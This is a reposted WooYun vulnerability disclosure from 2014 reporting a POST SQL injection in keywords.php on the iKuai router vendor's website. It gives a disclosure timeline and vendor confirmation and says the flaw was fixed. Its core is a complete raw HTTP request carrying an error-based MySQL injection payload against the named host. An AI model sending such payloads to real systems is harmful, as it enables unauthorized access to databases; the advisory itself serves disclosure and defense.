爱快路由主站存在严重SQL注入

admin
admin
admin
105013
文章
87
评论
2015年5月1日00:30:22评论363 views字数 202阅读0分40秒阅读模式
摘要

2014-07-17: 细节已通知厂商并且等待厂商处理中
2014-07-17: 厂商已经确认,细节仅向厂商公开
2014-07-27: 细节向核心白帽子及相关领域专家公开
2014-08-06: 细节向普通白帽子公开
2014-08-16: 细节向实习白帽子公开
2014-08-31: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2014-68811

漏洞标题: 爱快路由主站存在严重SQL注入

相关厂商: 爱快免费流控路由

漏洞作者: mango

提交时间: 2014-07-17 08:58

公开时间: 2014-08-31 09:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2014-07-17: 细节已通知厂商并且等待厂商处理中
2014-07-17: 厂商已经确认,细节仅向厂商公开
2014-07-27: 细节向核心白帽子及相关领域专家公开
2014-08-06: 细节向普通白帽子公开
2014-08-16: 细节向实习白帽子公开
2014-08-31: 细节向公众公开

简要描述:

详细说明:

非常严重偶~

code 区域 
POST /keywords.php HTTP/1.1
 Content-Length: 330
 Content-Type: application/x-www-form-urlencoded
 Cookie: PHPSESSID=7q81hvq9jvpm7apa9v9srpo8e7; onlineipd=120.210.184.236
 Host: www.ikuai8.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*
 
 keywords='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(89)%2cCHAR(83)%2cCHAR(79)%2cCHAR(122)%2cCHAR(48)%2cCHAR(90)%2cCHAR(69)%2cCHAR(120))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

post注入~~~

漏洞证明:

爱快路由主站存在严重SQL注入

爱快路由主站存在严重SQL注入

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-17 10:01

厂商回复:

感谢乌云

最新状态:

2014-08-11:已经修复

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin